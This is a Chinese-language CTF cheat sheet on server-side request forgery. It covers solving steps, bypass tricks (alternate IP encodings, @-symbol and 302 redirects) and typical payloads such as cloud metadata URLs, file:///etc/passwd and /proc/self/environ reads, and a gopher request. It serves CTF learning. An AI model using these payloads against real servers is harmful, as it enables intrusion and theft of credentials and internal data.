## **F. SSRF（Server-Side Request Forgery）**

### 1. 类型

* 内网 IP 访问（127.0.0.1, 10.x.x.x, 172.16.x.x, 192.168.x.x）
* URL 重定向绕过
* 协议绕过（file://, gopher://）
* 302 重定向 SSRF

### 2. 解题输出思路

1. 识别接受 URL 输入的端点（如 URL 抓取、头像加载）
2. 尝试访问 `http://127.0.0.1` 或 `http://localhost`
3. 尝试访问内网 IP 段
4. 尝试使用 `file://` 协议读取本地文件
5. 尝试使用 `gopher://` 协议构造更复杂的请求
6. 利用 302 重定向绕过过滤
7. 从响应中读取 flag 或其他敏感信息

### 3. 关注点

* URL 输入点如何被后端处理
* 是否过滤了内网 IP
* 是否过滤了 `file://`, `gopher://` 等协议
* 是否有 DNS 重绑定保护
* 是否有超时或长度限制

### 4. 通用

#### 通用步骤

* 尝试 `http://127.0.0.1`
* 尝试 `http://169.254.169.254` (AWS Metadata)
* 尝试 `file:///etc/passwd`

### 5. 方法论

* 利用服务器发起请求的特性
* 绕过后端过滤访问内网或本地资源
* 流程：URL 输入点 → 内网/本地请求 → 信息泄露 → flag 获取

### 6. 启发性问题

* 服务器是否在内网环境？
* 是否过滤了 `127.0.0.1` 或 `localhost`？
* 是否过滤了 `file://` 或 `gopher://`？
* 是否有 DNS 解析限制？

### 7. 绕过手法

* IP 地址格式绕过（127.1, 0x7f.0.0.1, 0177.0.0.1）
* URL 编码绕过
* 302 重定向绕过
* 协议绕过（file://, gopher://, dict://）
* 利用 @ 符号：`http://evil.com@127.0.0.1`

### 8. 典型 payload

#### 访问内网服务：

```
http://127.0.0.1:80
http://169.254.169.254/latest/meta-data/
http://0x7f.0.0.1:80
http://127.1:80
```

#### 读取本地文件：

```
file:///etc/passwd
file:///flag.txt
file:///proc/self/environ
```

#### Gopher 示例（构造 SMTP 请求读取 flag）：

```
gopher://127.0.0.1:25/_EHLO%20localhost%0AHELP
```
*（Gopher 的具体 payload 非常复杂，需要根据目标服务协议构造）*

#### 302 重定向绕过：

* 攻击者服务器返回 302 Location: `http://internal-service/flag`